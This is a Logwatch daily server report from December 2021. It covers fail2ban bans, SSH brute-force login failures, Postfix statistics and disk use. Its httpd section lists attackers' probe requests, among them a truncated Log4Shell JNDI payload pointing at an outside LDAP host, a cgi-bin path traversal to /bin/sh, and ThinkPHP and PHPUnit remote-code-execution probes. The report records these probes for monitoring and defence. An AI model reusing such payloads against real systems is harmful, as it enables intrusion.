################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Wed Dec 29 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-28 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 16:16 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
34.74.203.130 -> 161.97.119.209:25562: 1 Time(s)
92.118.234.202 -> zapf.wiki:443: 3 Time(s)
A total of 5 sites probed the server
103.156.91.51
159.223.29.144
159.223.37.69
165.227.221.200
8.210.90.76
Requests with error response codes
400 Bad Request
null: 5 Time(s)
mstshash=Domain: 4 Time(s)
/: 3 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... EqNlzwFY0iMAAAG: 3 Time(s)
zapf.wiki:443: 3 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
161.97.119.209:25562: 1 Time(s)
?: 1 Time(s)
\xF1\x9D\x92B+\xF6vU\xC7G,\xA55\x86b\xDFn1 ... C0$\xC0\x14\xC0: 1 Time(s)
r+\xD3\x00\xF5\xFE\xB78\x0C\xA7\x14\xE5\xE ... 00\x18\x005\x00: 1 Time(s)
s\xBC\x8Ed\xBC\xE2: 1 Time(s)
500 Internal Server Error
/: 23 Time(s)
/robots.txt: 3 Time(s)
/Autodiscover/Autodiscover.xml: 2 Time(s)
/_ignition/execute-solution: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/.env: 1 Time(s)
/?q=%indefatigableness%&va=b&t=hc&ia=web: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/HNAP1/: 1 Time(s)
/actuator/health: 1 Time(s)
/common/info.cgi: 1 Time(s)
/console/: 1 Time(s)
/currentsetting.htm: 1 Time(s)
/dniapi/userInfos: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (128.199.115.81): 36 Time(s)
root (104.131.96.156): 33 Time(s)
root (ip-198-12-255-244.ip.secureserver.net): 31 Time(s)
root (211.45.247.122): 19 Time(s)
unknown (ip-198-12-255-244.ip.secureserver.net): 17 Time(s)
unknown (104.131.96.156): 16 Time(s)
root (106.51.80.198): 15 Time(s)
root (181.13.51.177): 14 Time(s)
unknown (128.199.115.81): 14 Time(s)
root (111.93.214.67): 10 Time(s)
root (167.99.65.232): 10 Time(s)
unknown (211.45.247.122): 9 Time(s)
root (123.156.225.58): 7 Time(s)
unknown (123.156.225.58): 7 Time(s)
root (167.99.36.169): 6 Time(s)
unknown (106.51.80.198): 6 Time(s)
unknown (111.93.214.67): 3 Time(s)
unknown (167.99.65.232): 3 Time(s)
unknown (181.13.51.177): 3 Time(s)
unknown (24-220-156-37-dynamic.midco.net): 2 Time(s)
mailman (110.77.177.42): 1 Time(s)
mysql (104.131.96.156): 1 Time(s)
root (103.144.82.250): 1 Time(s)
root (164.92.214.107): 1 Time(s)
root (165.232.92.229): 1 Time(s)
unknown (118.99.79.52): 1 Time(s)
unknown (141.98.10.202): 1 Time(s)
unknown (141.98.10.63): 1 Time(s)
unknown (144.255.28.220): 1 Time(s)
Invalid Users:
Unknown Account: 84 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
3 Miscellaneous warnings
12.959K Bytes accepted 13,270
12.959K Bytes sent via SMTP 13,270
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
3 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
3 Total 4xx Rejects 100.00%
======== ==================================================
201 Connections
23 Connections lost (inbound)
201 Disconnections
1 Removed from queue
1 Sent via SMTP
8 Timeouts (inbound)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
103.144.82.250: 1 time
104.131.96.156: 34 times
106.51.80.198 (106.51.80.198.actcorp.in): 15 times
110.77.177.42: 1 time
111.93.214.67 (static-67.214.93.111-tataidc.co.in): 10 times
123.156.225.58: 7 times
128.199.115.81 (128.199.162.143-newcopy): 36 times
164.92.214.107: 1 time
165.232.92.229: 1 time
167.99.36.169: 6 times
167.99.65.232: 10 times
181.13.51.177 (host-181-13-51-177.mendoza.gov.ar): 14 times
198.12.255.244 (ip-198-12-255-244.ip.secureserver.net): 31 times
211.45.247.122: 19 times
Illegal users from:
2001:470:1:c84::12: 1 time
undef: 71 times
24.220.156.37 (24-220-156-37-dynamic.midco.net): 2 times
65.49.20.68 (scan-19.shadowserver.org): 1 time
104.131.96.156: 16 times
106.51.80.198 (106.51.80.198.actcorp.in): 6 times
111.93.214.67 (static-67.214.93.111-tataidc.co.in): 3 times
118.99.79.52: 1 time
123.156.225.58: 7 times
128.199.115.81 (128.199.162.143-newcopy): 14 times
141.98.10.63: 1 time
141.98.10.202: 1 time
144.255.28.220: 1 time
154.89.5.79: 1 time
167.99.65.232: 3 times
181.13.51.177 (host-181-13-51-177.mendoza.gov.ar): 3 times
198.12.255.244 (ip-198-12-255-244.ip.secureserver.net): 17 times
211.45.247.122: 9 times
**Unmatched Entries**
fatal: no matching cipher found: client aes128-cbc,blowfish-cbc,3des-cbc server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 8 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################